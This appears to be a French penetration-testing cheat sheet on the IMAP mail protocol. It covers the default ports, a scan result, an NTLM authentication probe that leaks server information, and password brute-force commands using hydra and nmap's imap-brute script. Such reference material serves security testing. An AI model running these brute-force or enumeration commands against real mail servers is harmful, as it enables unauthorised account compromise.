1. Infos
Protocole d’accès aux messages Internet
Comme son nom l’indique, IMAP vous permet d’accéder à vos messages électroniques où que vous soyez ; la plupart du temps, il est accessible via Internet. En principe, les messages électroniques sont stockés sur des serveurs. Chaque fois que vous consultez votre boîte de réception, votre client de messagerie contacte le serveur pour vous mettre en relation avec vos messages. Lorsque vous lisez un message électronique en utilisant IMAP, vous ne le téléchargez pas ou ne le stockez pas sur votre ordinateur, mais vous le lisez à partir du serveur. Il est donc possible de consulter votre courrier électronique à partir de plusieurs appareils différents sans rien manquer.
Par défaut, le protocole IMAP fonctionne sur deux ports :
- Port 143 – Par défaut, non sécurisé
- Port 993 – Port IMAP sécurisé
PORT STATE SERVICE REASON 143/tcp open imap syn-ack
2. NTLM Auth – Information disclosure
telnet example.com 143 * OK The Microsoft Exchange IMAP4 service is ready. >> a1 AUTHENTICATE NTLM
3. BruteForce
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V nmap -sV --script imap-brute -p <PORT> <IP>